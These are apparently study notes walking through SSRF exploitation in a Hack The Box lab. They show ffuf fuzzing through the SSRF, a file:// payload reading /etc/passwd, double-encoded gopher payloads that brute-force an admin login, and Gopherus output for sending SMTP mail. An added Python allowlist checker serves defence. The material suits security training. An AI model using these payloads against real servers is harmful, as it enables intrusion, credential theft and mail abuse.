Continuing from b-Identify SSRF, let’s move on to the exploitation part.

Accessing Restricted Endpoint

Let’s use ffuf to brute-force directories and find more accessible pages on the internal server.

The string "Server at dateserver.htb Port 80" is passed to -fr below to filter out the internal server’s HTTP 403 responses:

jadu101@htb[/htb]$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"
 
<SNIP>
 
[Status: 200, Size: 361, Words: 55, Lines: 16, Duration: 3872ms]
    * FUZZ: admin
[Status: 200, Size: 11, Words: 1, Lines: 1, Duration: 6ms]
    * FUZZ: availability

LFI

We can use the following parameter value to read the /etc/passwd file via the file:// scheme:

dateserver=file:///etc/passwd&date=2024-01-01

Gopher Protocol

Let’s say we found a login form at admin.php, which we reach through:

dateserver=http://dateserver.htb/admin.php&date=2024-01-01

We need to send a POST request with the credentials, but we cannot do so with the http:// URL scheme.

We can use the gopher URL scheme instead, which lets us send arbitrary bytes to a TCP socket.

Let’s say we want to try a common password such as admin; we can send the following POST request:

POST /admin.php HTTP/1.1
Host: dateserver.htb
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
 
adminpw=admin

To build a valid gopher URL, we URL-encode all special characters: spaces become %20 and CRLF line breaks become %0D%0A.

Converted to the gopher URL scheme, the above POST request looks like this:

gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin

Now let’s inject the above gopher URL into our original POST request.

Since we send our URL inside the HTTP POST parameter dateserver, which is itself URL-encoded, we must URL-encode the entire gopher URL a second time so that it has the correct format once the web server has decoded the parameter.

POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
 
dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01

After sending the above request, we can check from the response whether the password was correct.
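As an added example (not part of the original notes), here is the defender’s side of the same encoding mechanics: a check that decodes the dateserver parameter the way the application would, applies a scheme and host allowlist, and for gopher:// reconstructs the raw bytes that would reach the backend socket, which is what a code reviewer or a log-triage script needs to see. The allowlisted host and the sample bodies are constructed from the values used in these notes.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Only the backend the application is meant to reach (taken from the notes).
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"dateserver.htb"}


def inspect_dateserver(form_body: str) -> dict:
    """Decode the `dateserver` POST parameter the way the vulnerable app would
    and report scheme, host, an allow/deny verdict and, for gopher://, the raw
    bytes that would be written to the backend socket."""
    # parse_qs performs the first URL-decode, just like the server's form parser.
    target = parse_qs(form_body, keep_blank_values=True).get("dateserver", [""])[0]
    parts = urlsplit(target.strip())
    scheme = parts.scheme.lower()
    report = {
        "scheme": scheme,
        "host": parts.hostname,
        "allowed": scheme in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS,
        "raw_payload": None,
    }
    if scheme == "gopher":
        # Selector = "/" + one item-type byte ("_") + percent-encoded bytes.
        # The URL-fetching library applies the second decode, so unquote()
        # reveals exactly what would reach the TCP socket.
        selector = parts.path[1:]
        report["raw_payload"] = unquote(selector[1:]) if selector else ""
    return report


# Constructed sample bodies, shaped like the payloads shown in these notes.
SAMPLES = {
    "legit": "dateserver=http://dateserver.htb/availability.php&date=2024-01-01",
    "lfi": "dateserver=file:///etc/passwd&date=2024-01-01",
    "gopher": (
        "dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP"
        "%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a"
        "%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded"
        "%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01"
    ),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        r = inspect_dateserver(body)
        print(f"{name:6} scheme={r['scheme']!r:9} host={r['host']!r} allowed={r['allowed']}")
        if r["raw_payload"]:
            print("  bytes to socket:", repr(r["raw_payload"]))
```

Note that a scheme-only allowlist is not enough: http://127.0.0.1/admin.php passes a scheme check but still reaches an internal endpoint, which is why the host is checked too.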

Similarly, if we identify an SSRF vulnerability and TCP port 25 (SMTP) is open locally, we can use the same gopher technique to interact with that service in many ways.

Gopherus

Constructing gopher URLs by hand can be tricky, so we can use a tool such as Gopherus to generate them for us.

The following services are supported:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • SMTP
  • Zabbix
  • pymemcache
  • rbmemcache
  • phpmemcache
  • dmpmemcache

Python 2 is required to run this tool.

Let’s try generating a valid SMTP URL by supplying the corresponding argument.

The tool asks us for details about the email we intend to send. Afterwards, it outputs a valid gopher URL that we can use in our SSRF exploitation:

jadu101@htb[/htb]$ python2.7 gopherus.py --exploit smtp
 
  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/
 
                author: $_SpyD3r_$
 
 
Give Details to send mail: 
 
Mail from :  attacker@academy.htb
Mail To :  victim@academy.htb
Subject :  HelloWorld
Message :  Hello from SSRF!
 
Your gopher link is ready to send Mail: 
 
gopher://127.0.0.1:25/_MAIL%20FROM:attacker%40academy.htb%0ARCPT%20To:victim%40academy.htb%0ADATA%0AFrom:attacker%40academy.htb%0ASubject:HelloWorld%0AMessage:Hello%20from%20SSRF%21%0A.
 
-----------Made-by-SpyD3r-----------